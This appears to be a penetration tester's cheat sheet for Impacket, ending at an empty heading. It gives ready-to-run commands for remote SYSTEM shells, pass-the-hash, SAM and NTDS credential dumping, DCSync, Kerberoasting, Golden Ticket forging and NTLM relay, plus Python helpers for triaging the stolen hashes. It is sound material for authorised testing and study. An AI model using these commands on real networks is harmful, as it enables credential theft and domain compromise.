# Impacket Toolkit Cheat Sheet

## Overview

Impacket is a collection of Python classes for working with network protocols. It gives low-level, programmatic access to packets and implements several protocols, including SMB, MSRPC, DCOM and Kerberos. On top of the library it ships a large set of ready-to-use example scripts (the `*.py` tools covered below) that are widely used in penetration tests, above all against Windows and Active Directory environments.

**Warning:** Impacket is a security testing tool and must only be used in environments where you have explicit, written permission to do so.
## Installation

### From PyPI

```bash
pip install impacket
```

### From GitHub

```bash
git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
# install the library and the example scripts from the checkout
pip install .
```

### On Kali Linux

```bash
sudo apt update
# python3-impacket is the library; impacket-scripts installs the tools as impacket-psexec, impacket-secretsdump, ...
sudo apt install -y python3-impacket impacket-scripts
```

### Using a virtual environment

```bash
# Create and activate a virtual environment
python3 -m venv impacket-env
source impacket-env/bin/activate       # Linux/macOS
# impacket-env\Scripts\activate.bat    # Windows

# Install Impacket; the scripts (psexec.py, secretsdump.py, ...) land in the venv's bin directory
pip install impacket
```
## Command Execution Tools

### psexec.py

Executes commands on remote Windows systems over SMB, much like Sysinternals' PsExec: it uploads a service binary (RemComSvc) to a writable share (usually ADMIN$), creates and starts a service for it, and gives you an interactive shell running as SYSTEM. Because a binary is dropped on disk and a service is created, this is the noisiest of the exec tools and is routinely flagged by endpoint protection.

#### Basic usage

```bash
psexec.py [domain/]username[:password]@target [options] [command]
```

#### Common options

| Option | Description |
| --- | --- |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-k` | Use Kerberos authentication (ticket taken from the ccache in `KRB5CCNAME`) |
| `-no-pass` | Don't ask for a password (useful with `-k`) |
| `-port PORT` | SMB server port to connect to (default: 445) |
| `-service-name NAME` | Name of the service created on the target (default: random) |
| `-debug` | Turn DEBUG output on |

#### Examples

```bash
# Interactive SYSTEM shell with local credentials
psexec.py administrator:Password123@192.168.1.100

# Interactive shell with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100

# Run a single command instead of an interactive shell
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Pass-the-Hash. The LM part aad3b435... means "no LM hash stored"; the NT part
# 31d6cfe0... is the NT hash of an empty password and is only a placeholder here.
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```
### smbexec.py

Similar to psexec.py, but it does not upload a binary. For every command it creates a temporary service whose binary path is a `cmd.exe /Q /c <command>` one-liner that redirects output to a file on a share, reads the output back over SMB and deletes the service again. Nothing is written to disk as an executable, which is why it is often described as stealthier, but every command still produces a service installation event (Event ID 7045) on the target.

#### Basic usage

```bash
smbexec.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
| --- | --- |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-share SHARE` | Share the command output is read from (default: ADMIN$) |
| `-mode {SHARE,SERVER}` | SHARE writes output to a share on the target; SERVER hosts an SMB share on the attacking machine instead (needs root) |
| `-shell-type {cmd,powershell}` | Shell used to run the commands (default: cmd) |
| `-codec CODEC` | Encoding (codec) used to decode the target's output (default: utf-8) |
| `-service-name NAME` | Name of the service created on the target (default: random) |

#### Examples

```bash
# Semi-interactive shell with local credentials
smbexec.py administrator:Password123@192.168.1.100

# Semi-interactive shell with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100

# Pass-the-Hash (placeholder hashes, see psexec.py above)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100
```
### wmiexec.py

Executes commands on remote Windows systems through WMI (`Win32_Process.Create` over DCOM, i.e. TCP 135 plus a dynamic high port). No service is created; command output is redirected to a file on a share (ADMIN$ by default) and read back over SMB. With `-silentcommand` the command is started without output redirection, so no file is written at all.

#### Basic usage

```bash
wmiexec.py [domain/]username[:password]@target [options] [command]
```

#### Common options

| Option | Description |
| --- | --- |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-share SHARE` | Share the command output is read from (default: ADMIN$) |
| `-silentcommand` | Start the command and return immediately, without capturing output |
| `-codec CODEC` | Encoding (codec) used to decode the target's output (default: utf-8) |
| `-shell-type {cmd,powershell}` | Shell used to run the commands (default: cmd) |

#### Examples

```bash
# Semi-interactive shell with local credentials
wmiexec.py administrator:Password123@192.168.1.100

# Semi-interactive shell with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100

# Run a single command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Pass-the-Hash (placeholder hashes, see psexec.py above)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```
### dcomexec.py

Executes commands on remote Windows systems through DCOM objects that expose a command-execution method (`MMC20.Application`, `ShellWindows`, `ShellBrowserWindow`). As with wmiexec.py, output is collected through a share. Note that `ShellWindows` and `ShellBrowserWindow` are Explorer objects and only work when an interactive user session exists on the target; `MMC20.Application` does not have that requirement.

#### Basic usage

```bash
dcomexec.py [domain/]username[:password]@target [options] [command]
```

#### Common options

| Option | Description |
| --- | --- |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-object {ShellWindows,ShellBrowserWindow,MMC20}` | DCOM object to use (default: MMC20) |
| `-silentcommand` | Start the command and return immediately, without capturing output |
| `-codec CODEC` | Encoding (codec) used to decode the target's output (default: utf-8) |
| `-shell-type {cmd,powershell}` | Shell used to run the commands (default: cmd) |

#### Examples

```bash
# Semi-interactive shell with local credentials
dcomexec.py administrator:Password123@192.168.1.100

# Semi-interactive shell with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100

# Use a specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100

# Pass-the-Hash (placeholder hashes, see psexec.py above)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```
### atexec.py

Executes a command on a remote Windows system through the Task Scheduler service (the `atsvc` named pipe over SMB): it creates a scheduled task that runs the command with output redirected to a temporary file under `C:\Windows\Temp`, reads the file back through ADMIN$, and deletes both the task and the file. A command is mandatory; there is no interactive shell. Task creation and deletion are logged on the target (Security Event IDs 4698/4699 when task auditing is enabled).

#### Basic usage

```bash
atexec.py [domain/]username[:password]@target [options] command
```

#### Common options

| Option | Description |
| --- | --- |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-silentcommand` | Run the command and return immediately, without capturing output |
| `-codec CODEC` | Encoding (codec) used to decode the target's output (default: utf-8) |

#### Examples

```bash
# Run a command with local credentials; output is returned directly, no redirection needed
atexec.py administrator:Password123@192.168.1.100 whoami

# Run a command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "ipconfig /all"

# Pass-the-Hash (placeholder hashes, see psexec.py above)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 whoami
```
## Credential Dumping Tools

### secretsdump.py

Extracts credentials from a remote Windows system: local SAM hashes, LSA secrets (cached domain logons, service account passwords, the machine account password) and, on a domain controller, the contents of NTDS.dit. On a DC it uses the DRSUAPI replication protocol (DCSync) by default, which requires replication rights (Domain Admins or an account with the "Replicating Directory Changes" rights); `-use-vss` falls back to copying the hive files through a volume shadow copy instead. It can also parse hives and NTDS.dit copies offline (`LOCAL` mode).

#### Basic usage

```bash
secretsdump.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
| --- | --- |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-just-dc` | Extract only NTDS.dit data (NTLM hashes and Kerberos keys; domain controllers only) |
| `-just-dc-ntlm` | Extract only NTLM hashes from NTDS.dit (domain controllers only) |
| `-just-dc-user USER` | Extract NTDS.dit data for a single user only (e.g. `krbtgt`) |
| `-pwd-last-set` | Show the pwdLastSet attribute for each NTDS.dit account |
| `-user-status` | Show whether each account is enabled or disabled |
| `-history` | Also dump password history |
| `-use-vss` | Use the VSS method instead of DRSUAPI (noisier, but works without replication rights) |
| `-outputfile FILE` | Base name for output files (`FILE.sam`, `FILE.secrets`, `FILE.ntds`, ...) |

#### Examples

```bash
# Dump SAM, LSA secrets and cached credentials with local credentials
secretsdump.py administrator:Password123@192.168.1.100

# Same, with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100

# Pass-the-Hash (placeholder hashes, see psexec.py above)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Parse previously saved hive files offline (e.g. from "reg.py ... save")
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Parse an NTDS.dit copy offline (the SYSTEM hive is needed for the boot key)
secretsdump.py -ntds ntds.dit -system system.save LOCAL

# DCSync only the NTLM hashes of all domain accounts
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100

# DCSync a single account, e.g. krbtgt for a Golden Ticket
secretsdump.py -just-dc-user krbtgt domain/administrator:Password123@192.168.1.100
```
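The dump lines above follow the fixed `[domain\]user:rid:lmhash:nthash:::` format, and the first thing a tester does with them is triage: which accounts have an empty password, which still have an LM hash stored, which hashes are shared between accounts (password reuse between a local administrator and a domain user is the classic lateral-movement finding), and which lines to feed to hashcat mode 1000. The following parser is an added example, not part of Impacket; the sample dump is constructed by hand (the hash values are placeholders, not real secrets) and mimics the shape of secretsdump.py output, including a `-history` line, a machine account and a Kerberos keys section.

```python
import re
from collections import defaultdict

# Hashes Windows stores when no password / no LM hash is present.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the shape of secretsdump.py output (NOT a real dump;
# hash values are placeholders).
SAMPLE_DUMP = r"""
[*] Target system bootKey: 0x1a2b3c4d5e6f708192a3b4c5d6e7f809
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyadmin:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
contoso.local\jdoe:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
contoso.local\jdoe_history0:1105:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
contoso.local\svc_sql:1110:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
WS01$:1120:aad3b435b51404eeaad3b435b51404ee:0a1b2c3d4e5f60718293a4b5c6d7e8f9:::
[*] Kerberos keys grabbed
contoso.local\jdoe:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
[*] Cleaning up...
"""

# One dump line: optional "domain\" prefix, user, RID, 32-hex LM, 32-hex NT, ":::".
# Status lines ("[*] ...") and Kerberos key lines do not match because the RID
# field must be numeric.
_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)


def parse_secretsdump(text: str) -> list:
    """Return one dict per hash line, tagging history entries and machine accounts."""
    entries = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
        user = m["user"]
        account = f"{m['domain']}\\{user}" if m["domain"] else user
        entries.append({
            "account": account,
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
            "history": re.search(r"_history\d+$", user) is not None,   # from -history
            "machine": user.endswith("$"),                              # computer account
        })
    return entries


def triage(entries: list) -> dict:
    """Findings a tester wants from a dump, plus hashcat -m 1000 --username input lines."""
    current = [e for e in entries if not e["history"]]
    by_nt = defaultdict(list)
    for e in current:
        by_nt[e["nt"]].append(e["account"])
    return {
        "empty_password": [e["account"] for e in current if e["nt"] == EMPTY_NT],
        "lm_stored": [e["account"] for e in current if e["lm"] != EMPTY_LM],
        # same NT hash on more than one live account = same password (reuse)
        "reused": {nt: accts for nt, accts in by_nt.items() if len(accts) > 1},
        # machine account hashes are random 120-char passwords; do not waste GPU time on them
        "hashcat_lines": [f"{e['account']}:{e['nt']}" for e in current if not e["machine"]],
    }


if __name__ == "__main__":
    findings = triage(parse_secretsdump(SAMPLE_DUMP))
    for key, value in findings.items():
        print(f"{key}: {value}")
```

Run it on a real dump with `triage(parse_secretsdump(open("dump.ntds").read()))`; the `hashcat_lines` list is written one per line to a file and cracked with `hashcat -m 1000 --username`. A history line such as `jdoe_history0` is kept in the parsed entries (old passwords are useful for pattern analysis) but excluded from the reuse and empty-password checks, because it is not a live credential.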
## Kerberos Attack Tools

### GetNPUsers.py

Finds accounts that have "Do not require Kerberos preauthentication" set and, with `-request`, requests an AS-REP for each of them. The encrypted part of that AS-REP is derived from the account's password and is written out in John/hashcat format for offline cracking (AS-REP roasting). With domain credentials the tool enumerates the affected accounts via LDAP; without credentials it can only test a list of candidate user names.

#### Basic usage

```bash
GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]
```

#### Common options

| Option | Description |
| --- | --- |
| `-request` | Request the AS-REP for each vulnerable user and print it in John/hashcat format |
| `-no-pass` | Don't ask for a password (unauthenticated enumeration or Kerberos auth) |
| `-k` | Use Kerberos authentication |
| `-dc-ip IP` | IP address of the domain controller |
| `-usersfile FILE` | File with one user name per line to test (needed when running without credentials) |
| `-format {hashcat,john}` | Output format for the AS-REP hashes (default: hashcat) |
| `-outputfile FILE` | Write the hashes to this file |

#### Examples

```bash
# Authenticated: enumerate all accounts without preauthentication and request their AS-REPs
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request

# Unauthenticated: test a single user name (no password needed, the AS-REP itself is the prize)
GetNPUsers.py domain/user1 -dc-ip 192.168.1.100 -no-pass

# Unauthenticated: test a list of user names and save hashes in hashcat format
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -no-pass -format hashcat -outputfile asrep.txt
```

The resulting `$krb5asrep$23$...` hashes are cracked with `hashcat -m 18200`.
### GetUserSPNs.py

Lists user accounts that have a Service Principal Name (SPN) set and, with `-request`, requests a service ticket (TGS) for each of them. The ticket is encrypted with the service account's key, so it can be cracked offline to recover the account password (Kerberoasting). Any authenticated domain user can do this; machine accounts are not worth targeting because their passwords are random.

#### Basic usage

```bash
GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]
```

#### Common options

| Option | Description |
| --- | --- |
| `-request` | Request a TGS for every SPN found and print it in John/hashcat format |
| `-request-user USER` | Request a TGS only for the SPNs of this user (user name only, no domain) |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-dc-ip IP` | IP address of the domain controller |
| `-outputfile FILE` | Write the hashes to this file |
| `-format {hashcat,john}` | Output format for the TGS hashes (default: hashcat) |

#### Examples

```bash
# List SPNs and request a TGS for each of them
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request

# Request a TGS only for one account
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request-user sqlservice

# Save hashes in hashcat format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat -outputfile tgs.txt

# Pass-the-Hash (placeholder hashes, see psexec.py above)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request
```

RC4 tickets (`$krb5tgs$23$...`) are cracked with `hashcat -m 13100`. Accounts configured for AES only return etype 17/18 tickets (`$krb5tgs$17$`, `$krb5tgs$18$`, hashcat modes 19600/19700), which crack orders of magnitude more slowly.
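Roasting output from GetNPUsers.py and GetUserSPNs.py is usually collected into one file, and hashcat needs one mode per hash type, so the first step is to sort the lines by format and encryption type. The classifier below is an added example (not Impacket code): it recognizes the hashcat-format lines written by both tools, assigns the hashcat mode, and groups the lines per mode. The sample hashes are constructed with placeholder hex (real checksums and ciphertexts are much longer); the third field of an RC4 TGS hash is treated as an opaque string because Impacket rewrites it (for example replacing `:` with `~`) and its exact content has changed between versions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# hashcat modes per (format, etype). 32100/32200 exist since hashcat 6.2.6.
HASHCAT_MODES = {
    ("asrep", 23): 18200,   # Kerberos 5, etype 23, AS-REP
    ("asrep", 17): 32100,   # Kerberos 5, etype 17, AS-REP
    ("asrep", 18): 32200,   # Kerberos 5, etype 18, AS-REP
    ("tgs", 23): 13100,     # Kerberos 5, etype 23, TGS-REP
    ("tgs", 17): 19600,     # Kerberos 5, etype 17, TGS-REP
    ("tgs", 18): 19700,     # Kerberos 5, etype 18, TGS-REP
}

# $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<edata>
_ASREP = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$")
# $krb5tgs$23$*<user>$<REALM>$<service>*$<checksum>$<edata>
_TGS_RC4 = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<service>[^*]+)\*\$"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$")
# $krb5tgs$<17|18>$<user>$<REALM>$*<service>*$<checksum>$<edata>
_TGS_AES = re.compile(
    r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<service>[^*]+)\*\$"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$")


@dataclass
class RoastHash:
    kind: str            # "asrep" or "tgs"
    etype: int           # 23 = RC4-HMAC, 17/18 = AES128/AES256
    user: str
    realm: str
    service: Optional[str]
    mode: int            # hashcat mode
    raw: str


def classify(line: str) -> Optional[RoastHash]:
    """Parse one hashcat-format line; None if it is not a supported roasting hash."""
    line = line.strip()
    m = _ASREP.match(line)
    if m:
        etype = int(m["etype"])
        mode = HASHCAT_MODES.get(("asrep", etype))
        return RoastHash("asrep", etype, m["user"], m["realm"], None, mode, line) if mode else None
    m = _TGS_RC4.match(line)
    if m:
        return RoastHash("tgs", 23, m["user"], m["realm"], m["service"], 13100, line)
    m = _TGS_AES.match(line)
    if m:
        etype = int(m["etype"])
        return RoastHash("tgs", etype, m["user"], m["realm"], m["service"], HASHCAT_MODES[("tgs", etype)], line)
    return None


def group_by_mode(lines: List[str]) -> Dict[str, object]:
    """Split a mixed hash file into per-mode lists, keeping unrecognized lines aside."""
    by_mode: Dict[int, List[RoastHash]] = {}
    unsupported: List[str] = []
    for line in lines:
        if not line.strip():
            continue
        h = classify(line)
        if h is None:
            unsupported.append(line.strip())
        else:
            by_mode.setdefault(h.mode, []).append(h)
    return {"by_mode": by_mode, "unsupported": unsupported}


def hashcat_commands(by_mode: Dict[int, List[RoastHash]], wordlist: str = "wordlist.txt") -> List[str]:
    """One hashcat invocation per mode; write each group to hashes_<mode>.txt first."""
    return [f"hashcat -m {mode} hashes_{mode}.txt {wordlist}" for mode in sorted(by_mode)]


# Constructed sample lines (placeholder hex, far shorter than real ticket data).
SAMPLE_LINES = [
    "$krb5asrep$23$jdoe@CONTOSO.LOCAL:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff",
    "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/sqlserver.contoso.local~1433*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff",
    "$krb5tgs$18$svc_web$CONTOSO.LOCAL$*HTTP/web.contoso.local*$0123456789abcdef01234567$00112233445566778899aabbccddeeff",
    "not a kerberos hash at all",
]

if __name__ == "__main__":
    result = group_by_mode(SAMPLE_LINES)
    for cmd in hashcat_commands(result["by_mode"]):
        print(cmd)
    print("unsupported:", result["unsupported"])
```

Lines in John format (`-format john`) lack the etype field and are reported as unsupported rather than guessed at; rerun the tool with `-format hashcat` if hashcat is the cracker.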
### ticketer.py

Forges Kerberos tickets. A Golden Ticket is a TGT signed with the krbtgt account's key (NT hash or AES key, e.g. from `secretsdump.py -just-dc-user krbtgt`) and grants access to any service in the domain; a Silver Ticket is a service ticket signed with a service account's key (typically a machine account) and is valid only for the SPN given with `-spn`. The forged ticket is written to `<username>.ccache` in the current directory; there is no output-file option.

#### Basic usage

```bash
ticketer.py [options] username
```

#### Common options

| Option | Description |
| --- | --- |
| `-nthash HASH` | NT hash of the krbtgt account (Golden) or of the service account (Silver) |
| `-aesKey KEY` | AES key instead of the NT hash (AES tickets blend in better than RC4 on modern domains) |
| `-domain DOMAIN` | Fully qualified domain name |
| `-domain-sid SID` | Domain SID (e.g. from `lookupsid.py`) |
| `-spn SPN` | Service Principal Name; turns the ticket into a Silver Ticket |
| `-groups RIDS` | Comma-separated group RIDs to put in the PAC (default: 513,512,520,518,519, i.e. Domain Users/Admins, Group Policy Creator Owners, Schema Admins, Enterprise Admins) |
| `-duration HOURS` | Ticket lifetime in hours (default: 10 in current releases; older versions defaulted to 10 years, which is an easy detection) |

#### Examples

```bash
# Golden Ticket (krbtgt NT hash below is a placeholder)
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator

# Silver Ticket for the SQL service on sqlserver (use the SQL service account's / machine account's NT hash)
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator

# Use the forged ticket (written to administrator.ccache) with any Impacket tool:
# Kerberos needs the target's host name, not its IP address
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass contoso.local/administrator@dc01.contoso.local
```
## Network Protocol Tools

### smbclient.py

An SMB client for browsing shares and transferring files on remote systems, with a small interactive shell.

#### Basic usage

```bash
smbclient.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
| --- | --- |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-port PORT` | SMB server port to connect to (default: 445) |
| `-file FILE` | Input file with commands to run in the mini shell (non-interactive use) |
| `-debug` | Turn DEBUG output on |

#### Common commands (interactive shell)

| Command | Description |
| --- | --- |
| `help` | Show available commands |
| `shares` | List available shares |
| `use <share>` | Connect to a share |
| `ls` | List files in the current directory |
| `cd <dir>` | Change directory |
| `get <file>` | Download a file |
| `put <file>` | Upload a file |
| `rm <file>` | Delete a file |
| `mkdir <dir>` | Create a directory |
| `rmdir <dir>` | Remove a directory |
| `exit` | Exit the shell |

#### Examples

```bash
# Connect with local credentials
smbclient.py administrator:Password123@192.168.1.100

# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100

# Pass-the-Hash (placeholder hashes, see psexec.py above)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```
### mssqlclient.py

A client for Microsoft SQL Server instances. It supports both SQL Server authentication and Windows (NTLM/Kerberos) authentication; domain accounts and `-hashes` require `-windows-auth`. The shell's helper commands make the usual post-exploitation steps (enabling `xp_cmdshell`, running OS commands) one-liners.

#### Basic usage

```bash
mssqlclient.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
| --- | --- |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash, needs `-windows-auth`) |
| `-windows-auth` | Use Windows authentication instead of SQL Server authentication (default: off) |
| `-port PORT` | Destination port (default: 1433) |
| `-db DATABASE` | Database to connect to (default: the login's default database) |
| `-file FILE` | Input file with SQL commands to run in the SQL shell |
| `-debug` | Turn DEBUG output on |

#### Common commands (interactive shell)

| Command | Description |
| --- | --- |
| `help` | Show available commands |
| `enable_xp_cmdshell` | Enable the `xp_cmdshell` stored procedure (needs sysadmin) |
| `disable_xp_cmdshell` | Disable the `xp_cmdshell` stored procedure |
| `xp_cmdshell <command>` | Run an OS command through `xp_cmdshell` (runs as the SQL Server service account) |
| `sp_start_job <job>` | Start a SQL Server Agent job |
| `exit` | Exit the shell |

#### Examples

```bash
# SQL Server authentication with the sa account
mssqlclient.py sa:Password123@192.168.1.100

# Windows authentication with a domain account
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth

# Pass-the-Hash (placeholder hashes, see psexec.py above); NTLM implies Windows authentication
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/sqluser@192.168.1.100 -windows-auth

# Run the statements in a file and exit
mssqlclient.py sa:Password123@192.168.1.100 -file queries.sql
```
## Other Useful Tools

### ntlmrelayx.py

Performs NTLM relay attacks: it runs rogue servers (SMB and HTTP by default) that accept incoming NTLM authentications, typically coerced or poisoned with Responder or a coercion tool, and forwards them to the targets given with `-t`/`-tf`. With no `-c`/`-e` the default action on a successful SMB relay is to dump the target's local SAM with secretsdump.py. Relaying only works against targets that do not enforce signing (SMB signing for `smb://`, LDAP signing and channel binding for `ldap://`/`ldaps://`), and since MS08-068 an authentication cannot be relayed back to the host it came from. When run next to Responder, disable Responder's SMB and HTTP servers so the two do not compete for the same ports.

#### Basic usage

```bash
ntlmrelayx.py [options]
```

#### Common options

| Option | Description |
| --- | --- |
| `-t TARGET` | Target to relay the credentials to, as a URL (e.g. `smb://host`, `ldap://dc`, `mssql://host`) |
| `-tf FILE` | File with one target URL per line |
| `-w` | Watch the target file for changes and reload it (only with `-tf`) |
| `-e FILE` | File to upload and execute on the target after a successful relay |
| `-c COMMAND` | Command to execute on the target after a successful relay |
| `-smb2support` | Enable SMB2 support on the rogue SMB server (needed for modern clients) |
| `-socks` | Keep relayed sessions open behind a SOCKS proxy for use by other tools |
| `-one-shot` | Run the attack only once per target |
| `-debug` | Turn DEBUG output on |

#### Examples

```bash
# Relay to one SMB target; without -c/-e the local SAM of the target is dumped
ntlmrelayx.py -t smb://192.168.1.100 -smb2support

# Relay to every target in the file
ntlmrelayx.py -tf targets.txt -smb2support

# Run a command on the target after a successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\temp\whoami.txt"

# Hold relayed sessions open behind a SOCKS proxy (then e.g. proxychains smbclient.py -no-pass ...)
ntlmrelayx.py -tf targets.txt -smb2support -socks
```
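Because a relay to a host that requires SMB signing simply fails, the `-tf` target list is normally built from a signing scan first, for example `nmap -p445 --script smb2-security-mode <range>`, whose `smb2-security-mode` script reports "Message signing enabled and required" or "Message signing enabled but not required" per host. The script below is an added example (not part of Impacket or nmap): it parses nmap's normal output into a per-host signing status and emits `smb://<ip>` lines only for hosts where signing is not required. The nmap output embedded in it is constructed to match that report shape, not captured from a real scan, and the `exclude` parameter is a hypothetical convenience for dropping the machine the coerced authentication originates from.

```python
import re
from typing import Dict, List, Optional, Set

# Constructed sample in the shape of "nmap -p445 --script smb2-security-mode" output
# (not a real scan).
SAMPLE_NMAP = """\
Nmap scan report for 192.168.1.100
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for dc01.contoso.local (192.168.1.10)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.168.1.101
Host is up (0.0011s latency).

PORT    STATE SERVICE
445/tcp closed microsoft-ds
"""

# "Nmap scan report for <ip>" or "Nmap scan report for <name> (<ip>)"
_REPORT = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[\d.]+)\))?$")


def parse_signing(nmap_output: str) -> List[Dict[str, Optional[str]]]:
    """Return one record per host: ip, hostname, and signing = required / not_required / unknown."""
    hosts: List[Dict[str, Optional[str]]] = []
    current: Optional[Dict[str, Optional[str]]] = None
    for line in nmap_output.splitlines():
        m = _REPORT.match(line.strip())
        if m:
            ip = m["ip"] or m["name"]
            hostname = m["name"] if m["ip"] else None
            current = {"ip": ip, "hostname": hostname, "signing": "unknown"}
            hosts.append(current)
            continue
        if current is None or "Message signing" not in line:
            continue
        text = line.lower()
        if "and required" in text:
            current["signing"] = "required"
        elif "not required" in text or "disabled" in text:
            current["signing"] = "not_required"
    return hosts


def relay_targets(nmap_output: str, exclude: Optional[Set[str]] = None) -> List[str]:
    """smb:// target lines for ntlmrelayx -tf: hosts without signing enforcement, minus exclusions."""
    exclude = exclude or set()
    return [
        f"smb://{h['ip']}"
        for h in parse_signing(nmap_output)
        if h["signing"] == "not_required" and h["ip"] not in exclude
    ]


if __name__ == "__main__":
    # Hosts with port 445 closed or no script output stay "unknown" and are left out.
    for target in relay_targets(SAMPLE_NMAP):
        print(target)
```

Write the returned lines to `targets.txt` and pass it with `-tf targets.txt -smb2support`; the domain controller in the sample is correctly dropped because it requires signing (the default for DCs), and the host with port 445 closed is dropped because its status is unknown.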
### lookupsid.py

